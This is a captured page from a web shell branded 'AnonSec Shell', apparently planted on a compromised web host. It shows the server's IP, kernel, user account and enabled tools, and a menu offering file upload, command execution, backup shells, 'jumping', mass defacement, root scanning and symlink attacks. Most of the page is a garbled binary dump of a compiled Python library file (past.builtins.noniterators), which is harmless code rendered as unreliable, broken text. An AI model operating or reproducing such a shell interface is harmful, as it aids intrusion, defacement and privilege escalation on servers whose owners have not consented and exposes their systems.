. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 162.0.212.4  /  Your IP : 216.73.216.167   [ Reverse IP ]
Web Server : LiteSpeed
System : Linux premium146.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : alshnoli ( 2431)
PHP Version : 8.3.28
Disable Function : NONE
Domains : 1 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/alt/python37/lib/python3.7/site-packages/past/builtins/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /opt/alt/python37/lib/python3.7/site-packages/past/builtins/__pycache__/noniterators.cpython-37.pyc
B

�A�[�$�@s�dZddlmZmZmZddlmZmZddlZddlm	Z	ddl
mZdd�Zer�ddl
Z
d	d
�Zdd�Zd
d�Zdd�ZeZeZeZddlmZeZdddddgZn*ddlZejZejZejZejZejZgZdS)a,
This module is designed to be used as follows::

    from past.builtins.noniterators import filter, map, range, reduce, zip

And then, for example::

    assert isinstance(range(5), list)

The list-producing functions this brings in are::

- ``filter``
- ``map``
- ``range``
- ``reduce``
- ``zip``

�)�division�absolute_import�print_function)�chain�starmapN)�
basestring)�PY3cCst�t||��S)N)r�
from_iterable�map)�f�items�r
�K/opt/alt/python37/lib/python3.7/site-packages/past/builtins/noniterators.py�flatmapsrcGs^t|d�}t|dt�r,|��tj|��St|dttf�rL|tj|��Sttj|��SdS)a*
        filter(function or None, sequence) -> list, tuple, or string

        Return those items of sequence for which function(item) is true.
        If function is None, return the items that are true.  If sequence
        is a tuple or string, return the same type, else return a list.
        �N)�type�
isinstancer�join�builtins�filter�tuple�list)�argsZmytyper
r
r�	oldfilter$src
Gs�tj|�}t|�}t|�dkr"gS|dkr0|}ntt||��}y(tdd�|D��dkrdtt�|��SWn"tk
r�}zWdd}~XYnX|S)a
        map(function, sequence[, sequence, ...]) -> list

        Return a list of the results of applying the function to the
        items of the argument sequence(s).  If more than one sequence is
        given, the function is called with an argument list consisting of
        the corresponding item of each sequence, substituting None for
        missing values when not all sequences have the same length.  If
        the function is None, return a list of the items of the sequence
        (or a list of tuples if more than one sequence).

        Test cases:
        >>> oldmap(None, 'hello world')
        ['h', 'e', 'l', 'l', 'o', ' ', 'w', 'o', 'r', 'l', 'd']

        >>> oldmap(None, range(4))
        [0, 1, 2, 3]

        More test cases are in past.tests.test_builtins.
        rNcSsg|]}t|��qSr
)�len)�.0�itemr
r
r�
<listcomp>Xszoldmap.<locals>.<listcomp>r)	�	itertools�zip_longestrrr�maxrr	�	TypeError)�func�	iterablesZzipped�l�result�er
r
r�oldmap8s
r'cOsttj||��S)N)rr�range)r�kwargsr
r
r�oldrange�sr*cOsttj||��S)N)rr�zip)rr)r
r
r�oldzip�sr,)�reducerr
r(r-r+)�__doc__�
__future__rrrrrrZ
past.typesrZ
past.utilsrrrrr'r*r,rr
r(�	functoolsr-r+�__all__Z__builtin__r
r
r
r�<module>s4D

Anon7 - 2022
AnonSec Team